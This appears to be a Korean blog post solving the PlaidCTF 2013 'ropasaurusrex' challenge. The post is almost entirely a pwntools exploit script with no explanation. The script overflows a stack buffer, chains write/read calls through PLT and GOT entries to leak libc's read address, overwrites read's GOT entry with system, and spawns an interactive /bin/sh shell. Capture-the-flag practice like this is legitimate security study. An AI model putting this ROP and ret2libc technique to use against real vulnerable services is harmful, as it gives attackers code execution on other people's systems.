[PlaidCTF 2013] ropasaurusrex

Recent Posts

Archives

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Tags more

관리 메뉴

ii4gsp

[PlaidCTF 2013] ropasaurusrex 본문

시스템 해킹/CTF

[PlaidCTF 2013] ropasaurusrex

ii4gsp 2020. 3. 13. 19:12

from pwn import *

p = process('./ropasaurusrex')
e = ELF('./ropasaurusrex')
libc = e.libc

pppr = 0x080484b6

payload = ''
payload += '\x90' * (0x88 + 4)
payload += p32(e.plt['write']) + p32(pppr) + p32(1) + p32(e.got['read']) + p32(4)
payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.bss()) + p32(8)
payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.got['read']) + p32(4)
payload += p32(e.plt['read']) + '\x90' * 4 + p32(e.bss())

p.sendline(payload)

leak = u32(p.recv(4))
libc_base = leak - libc.symbols['read']
system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

payload = ''
payload += '/bin/sh\x00'
payload += p32(system)

p.sendline(payload)

p.interactive()

'시스템 해킹 > CTF' 카테고리의 다른 글

HSCTF 6 - return-to-sender (0)	2020.03.17
HSCTF 6 - byte (0)	2020.03.17
picoCTF - NewOverFlow-2 (0)	2020.03.10
picoCTF - NewOverFlow-1 (0)	2020.03.10
picoCTF - CanaRy (0)	2020.03.10

'시스템 해킹/CTF' Related Articles

Comments

ii4gsp

[PlaidCTF 2013] ropasaurusrex 본문

[PlaidCTF 2013] ropasaurusrex

'시스템 해킹 > CTF' 카테고리의 다른 글

티스토리툴바